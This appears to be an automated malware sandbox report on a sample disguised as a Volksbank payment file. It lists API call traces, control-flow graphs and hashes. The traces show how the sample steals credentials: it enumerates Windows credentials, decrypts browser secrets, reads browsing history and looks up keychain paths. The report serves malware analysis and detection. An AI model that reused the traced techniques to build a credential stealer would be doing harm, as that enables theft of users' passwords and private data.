                                                                                                                                                                                                                                            • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                                                                            • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                                                                                                                                                            • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00445986
                                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
Strings
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateFolderHandlePathProcSizeSpecial_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
• String ID: *.*$Apple Computer\Preferences\keychain.plist
• API String ID: 1963886904-3798722523

Control-flow Graph

APIs
  • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
  • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
  • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
  • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
• SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 00412799
• GetModuleHandleW.KERNEL32(00000000,0041493C,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004127B2
• EnumResourceTypesW.KERNEL32(00000000,?,00000002), ref: 004127B9
Strings
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
• String ID: $/deleteregkey$/savelangfile
• API String ID: 2744995895-28296030

Control-flow Graph

APIs
• memset.MSVCRT ref: 0040B71C
  • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
  • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
• wcsrchr.MSVCRT ref: 0040B738
• memset.MSVCRT ref: 0040B756
• memset.MSVCRT ref: 0040B7F5
• CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
• CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
• CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
• memset.MSVCRT ref: 0040B851
• memset.MSVCRT ref: 0040B8CA
• memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
  • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
  • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
• DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
• memset.MSVCRT ref: 0040BB53
• memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
• LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
Strings
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: memset$File$Freewcsrchr$AddressCloseCopyCreateCryptDataDeleteHandleLibraryLocalProcUnprotectmemcmpmemcpywcscpy
• String ID: chp$v10
• API String ID: 1297422669-2783969131

Control-flow Graph

[Control-flow graph for function 0040E2AB (blocks 40e2ab-40e4af); legend: Executed / Not Executed]
APIs
  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
  • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
• free.MSVCRT ref: 0040E49A
  • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
• memset.MSVCRT ref: 0040E380
  • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
  • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
• wcschr.MSVCRT ref: 0040E3B8
• memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,76942EE0), ref: 0040E3EC
• memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,76942EE0), ref: 0040E407
• memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,76942EE0), ref: 0040E422
• memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,76942EE0), ref: 0040E43D
Strings
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
• String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
• API String ID: 3849927982-2252543386
• Opcode ID: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
• Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
• Opcode Fuzzy Hash: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
• Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58

Control-flow Graph (function at 004091B8; graph rendering and executed/not-executed legend omitted)
APIs
• memset.MSVCRT ref: 004091E2
  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
• memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
• memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
• memcpy.MSVCRT(?,00000023,?), ref: 0040930C
• memcpy.MSVCRT(?,?,00000010), ref: 00409325
• memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
• memcpy.MSVCRT(?,00000015,?), ref: 00409357
• memcpy.MSVCRT(?,?,00000010), ref: 00409370
• memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
• memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
• memcpy.MSVCRT(?,00000023,?), ref: 00409462
• memcpy.MSVCRT(?,?,00000010), ref: 0040947E
• memcpy.MSVCRT(?,?,00000020), ref: 0040949A
• memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
• memcpy.MSVCRT(?,00000015,?), ref: 004094D0
• memcpy.MSVCRT(?,?,00000020), ref: 004094E8
Strings
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: memcpy$memcmp$ByteCharMultiWidememset
• String ID:
• API String ID: 3715365532-3916222277
• Opcode ID: 0b5d2420ae1e05a47c945b1ba07dbbc3733902293ebddf2e47a1979dcc9084dd
• Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
• Opcode Fuzzy Hash: 0b5d2420ae1e05a47c945b1ba07dbbc3733902293ebddf2e47a1979dcc9084dd
• Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

Control-flow Graph (graph rendering omitted)

APIs
  • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
  • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
  • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
  • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
  • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
  • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
• OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
• GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
• DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
• GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
  • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
  • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
  • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
  • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
• CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
• MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
• WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
• UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
• CloseHandle.KERNELBASE(?), ref: 0040E13E
• CloseHandle.KERNEL32(00000000), ref: 0040E143
• CloseHandle.KERNEL32(?), ref: 0040E148
• CloseHandle.KERNEL32(?), ref: 0040E14D
Strings
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
• String ID: bhv
• API String ID: 4234240956-2689659898
• Opcode ID: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
• Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
• Opcode Fuzzy Hash: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
• Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                                                                                                                                                                                                                          Control-flow Graph

control_flow_graph 691 413f4f-413f52 692 413fa5 691->692 693 413f54-413f5a call 40a804 691->693 695 413f5f-413fa4 GetProcAddress * 5 693->695 695->692
APIs
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
• GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
• GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
• GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
• GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
• GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
Strings
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
• String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
• API String ID: 2941347001-70141382
• Opcode ID: f3462473bc82ea1c51451d3a028beeb45a1422339b7559a3bc587941b48753d6
• Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
• Opcode Fuzzy Hash: f3462473bc82ea1c51451d3a028beeb45a1422339b7559a3bc587941b48753d6
• Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

Control-flow Graph

APIs
• memset.MSVCRT ref: 0040C298
  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
• FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
• wcschr.MSVCRT ref: 0040C324
• wcschr.MSVCRT ref: 0040C344
• FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
• GetLastError.KERNEL32 ref: 0040C373
• FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
• FindCloseUrlCache.WININET(?), ref: 0040C3B0
Strings
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
• String ID: visited:
• API String ID: 2470578098-1702587658
• Opcode ID: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
• Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
• Opcode Fuzzy Hash: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
• Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

Control-flow Graph

control_flow_graph 721 40e175-40e1a1 call 40695d call 406b90 726 40e1a7-40e1e5 memset 721->726 727 40e299-40e2a8 call 4069a3 721->727 729 40e1e8-40e1f3 call 406e8f 726->729 732 40e1f8-40e1fa 729->732 733 40e270-40e27d call 406b53 732->733 734 40e1fc-40e219 call 40dd50 * 2 732->734 733->729 739 40e283-40e286 733->739 734->733 745 40e21b-40e21d 734->745 742 40e291-40e294 call 40aa04 739->742 743 40e288-40e290 free 739->743 742->727 743->742 745->733 746 40e21f-40e235 call 40742e 745->746 746->733 749 40e237-40e242 call 40aae3 746->749 749->733 752 40e244-40e26b _snwprintf call 40a8d0 749->752 752->733
APIs
  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
• memset.MSVCRT ref: 0040E1BD
  • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
• free.MSVCRT ref: 0040E28B
  • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
  • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
  • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
• _snwprintf.MSVCRT ref: 0040E257
  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
  • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
Strings
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
• String ID: $ContainerId$Container_%I64d$Containers$Name
• API String ID: 2804212203-2982631422
• Opcode ID: 7a95fccbd23525aa76b2e079fc64e0475dfff11d865135f876cd6a5397388c2b
• Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
• Opcode Fuzzy Hash: 7a95fccbd23525aa76b2e079fc64e0475dfff11d865135f876cd6a5397388c2b
• Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

Control-flow Graph

control_flow_graph 770 40bdb0-40bdce call 404363 773 40bf63-40bf6f call 40440c 770->773 774 40bdd4-40bddd 770->774 775 40bdee 774->775 776 40bddf-40bdec CredEnumerateW 774->776 778 40bdf0-40bdf2 775->778 776->778 778->773 780 40bdf8-40be18 call 40b2cc wcslen 778->780 783 40bf5d-40bf60 LocalFree 780->783 784 40be1e-40be20 780->784 783->773 784->783 785 40be26-40be42 wcsncmp 784->785 786 40be48-40be77 call 40bd5d call 404423 785->786 787 40bf4e-40bf57 785->787 786->787 792 40be7d-40bea3 memset 786->792 787->783 787->784 793 40bea5 792->793 794 40bea7-40beea memcpy 792->794 793->794 795 40bf11-40bf2d wcschr 794->795 796 40beec-40bf06 call 40b2cc _wcsnicmp 794->796 798 40bf38-40bf48 LocalFree 795->798 799 40bf2f-40bf35 795->799 796->795 801 40bf08-40bf0e 796->801 798->787 799->798 801->795
APIs
  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
• CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
• wcslen.MSVCRT ref: 0040BE06
• wcsncmp.MSVCRT ref: 0040BE38
• memset.MSVCRT ref: 0040BE91
• memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
• _wcsnicmp.MSVCRT ref: 0040BEFC
• wcschr.MSVCRT ref: 0040BF24
                                                                                                                                                                                                                                          • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                                                                                                                                                                          • LocalFree.KERNELBASE(?,00000214,?,00000000,?), ref: 0040BF60
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressProc$FreeLocal$CredEnumerate_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1564206659-0
                                                                                                                                                                                                                                          • Opcode ID: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                                                                                                                                                                                                                                          • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69

Control-flow Graph
APIs
  • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
  • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
  • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
• memset.MSVCRT ref: 0040BC75
• memset.MSVCRT ref: 0040BC8C
• WideCharToMultiByte.KERNEL32(00000000,00000000,Function_0004E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
• memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
• memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
• LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
• String ID:
• API String ID: 115830560-3916222277
• Opcode ID: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
• Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
• Opcode Fuzzy Hash: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
• Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

Control-flow Graph
control_flow_graph 855 41837f-4183bf 856 4183c1-4183cc call 418197 855->856 857 4183dc-4183ec call 418160 855->857 862 4183d2-4183d8 856->862 863 418517-41851d 856->863 864 4183f6-41840b 857->864 865 4183ee-4183f1 857->865 862->857 866 418417-418423 864->866 867 41840d-418415 864->867 865->863 868 418427-418442 call 41739b 866->868 867->868 871 418444-41845d CreateFileW 868->871 872 41845f-418475 CreateFileA 868->872 873 418477-41847c 871->873 872->873 874 4184c2-4184c7 873->874 875 41847e-418495 GetLastError free 873->875 878 4184d5-418501 memset call 418758 874->878 879 4184c9-4184d3 874->879 876 4184b5-4184c0 call 444706 875->876 877 418497-4184b3 call 41837f 875->877 876->863 877->863 883 418506-418515 free 878->883 879->878 883->863
APIs
• CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
• CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
• GetLastError.KERNEL32 ref: 0041847E
• free.MSVCRT ref: 0041848B
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: CreateFile$ErrorLastfree
• String ID: |A
• API String ID: 77810686-1717621600
• Opcode ID: b9220c8ee9235e77546fc7e578fe859ac5c7910c95b4d012992e052ab282d142
• Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
• Opcode Fuzzy Hash: b9220c8ee9235e77546fc7e578fe859ac5c7910c95b4d012992e052ab282d142
• Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
APIs
• memset.MSVCRT ref: 0041249C
• ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
• ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
• GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
• LoadIconW.USER32(00000000,00000065), ref: 0041258B
• wcscpy.MSVCRT ref: 004125A0
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: ??2@$HandleIconLoadModulememsetwcscpy
• String ID: r!A
• API String ID: 2791114272-628097481
• Opcode ID: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
• Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
• Opcode Fuzzy Hash: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
• Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
APIs
  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
  • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
